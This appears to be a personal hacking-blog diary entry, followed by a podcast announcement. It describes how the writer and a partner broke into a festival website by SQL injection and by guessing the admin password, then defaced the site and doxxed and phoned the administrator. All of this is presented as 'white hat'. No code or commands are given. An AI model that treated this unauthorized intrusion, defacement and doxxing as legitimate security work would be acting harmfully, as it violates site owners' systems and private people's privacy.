When I awoke from my slumber I had a message which simply said "Cool". I should have known Clocwork wouldn't care about it until he had seen it for himself. When he finally joined me in my endeavours we began to test the site for other vulnerabilities; finding none, we focused solely on the SQL injection. After many creative attempts we finally found the user table. When we inspected it further I noticed that there was no password column. Disappointed, I continued to search through the table, only finding the usernames.

So, distraught, Clocwork and I retreated to ponder our attack. While he was working on the password columns I decided "Hey, why not try password guessing". So I got a list of every username, and began my attack. I tried the name of the event, and presto! I was granted super administrator access. Dumbstruck by the admin's terrible password choice, I paused to really contemplate his ignorance. Then I messaged my colleague to tell him the good news, and we planned our next move. Our plan was to simply email the admin explaining how we got in, but I decided to go with a different plan. So we created a deface page as a proof of concept, then proceeded to dox the system admin. After finding his information we called his home, and had a good chat. Promptly he fixed the vulnerabilities, and changed the passwords to something much more difficult to guess. During our chat Clocwork and I were offered the opportunity to volunteer and do security for the festival next year. So sometimes doing a white hat hack has its benefits.

    This is all for my hacking diary... For now. May your blade stay sharp, your mind sharper.

Friday, April 8, 2011

PODCAST : Episode One - Introductions

This is the introduction podcast where we explain who we are, what we do, and what this blog will be about. We hope you enjoy this blog and these podcasts!